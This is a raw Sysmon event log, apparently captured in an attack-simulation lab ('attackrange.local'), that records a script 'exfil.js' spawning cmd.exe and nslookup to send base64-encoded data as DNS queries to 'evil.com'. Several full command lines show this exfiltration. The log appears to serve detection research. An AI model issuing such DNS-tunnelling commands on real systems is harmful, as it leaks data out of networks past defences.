14:21:28.359{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.359{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2343-000000005F02}7304C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.359{2E1864BB-18E8-629A-2143-000000005F02}8016420C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-2343-000000005F02}7304C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.368{2E1864BB-18E8-629A-2343-000000005F02}7304C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-2143-000000005F02}8016C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlhk.tmp 2>&1 354300x8000000000000000207754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.886{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62035-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62035-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.880{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50562- 354300x8000000000000000207751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.879{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50561- 354300x8000000000000000207750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.879{00000000-0000-0000-0000-000000000000}6016<unknown process>-udptruefalse127.0.0.1-50561-false127.0.0.1-53domain 354300x8000000000000000207749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.878{00000000-0000-0000-0000-000000000000}6016<unknown process>-udpfalsefalse127.0.0.1-50560-false127.0.0.1-53domain 354300x8000000000000000207748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.878{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50560- 354300x8000000000000000207747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.878{00000000-0000-0000-0000-000000000000}6016<unknown process>-udptruefalse127.0.0.1-50560-false127.0.0.1-53domain 354300x8000000000000000207746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50559- 354300x8000000000000000207745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50558- 354300x8000000000000000207744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.759{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50557- 354300x8000000000000000207743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.759{00000000-0000-0000-0000-000000000000}8052<unknown process>-udptruefalse127.0.0.1-50557-false127.0.0.1-53domain 354300x8000000000000000207742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.687{00000000-0000-0000-0000-000000000000}4228<unknown process>-udpfalsefalse127.0.0.1-50556-false127.0.0.1-53domain 354300x8000000000000000207741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.686{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61124-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.686{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61124-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.685{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50556- 10341000x8000000000000000207738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.343{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2243-000000005F02}5584C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.343{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-2243-000000005F02}5584C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.328{2E1864BB-18E8-629A-2243-000000005F02}55847564C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2143-000000005F02}8016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.328{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2243-000000005F02}5584C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.313{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.313{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2143-000000005F02}8016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.313{2E1864BB-18E0-629A-6742-000000005F02}39762200C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-2143-000000005F02}8016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.319{2E1864BB-18E8-629A-2143-000000005F02}8016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnlhk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.297{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfcum.tmpMD5=13B747063E29DDAFB1C25744F690BAA2,SHA256=FFD02DE1BE5A2F9B37BEA75BF31D9F7DC3AB49C7A69DB9B5050D219E835321C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-18E8-629A-1F43-000000005F02}71926496C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-2043-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-2043-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.259{2E1864BB-18E8-629A-1E43-000000005F02}26207484C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-2043-000000005F02}8152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.261{2E1864BB-18E8-629A-2043-000000005F02}8152C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-1E43-000000005F02}2620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A U2VydmljZU5hbWU6IGVuYQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfcum.tmp 2>&1 10341000x8000000000000000207718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.228{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-1F43-000000005F02}7192C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.228{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-1F43-000000005F02}7192C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.212{2E1864BB-18E8-629A-1F43-000000005F02}71926496C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-1E43-000000005F02}2620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 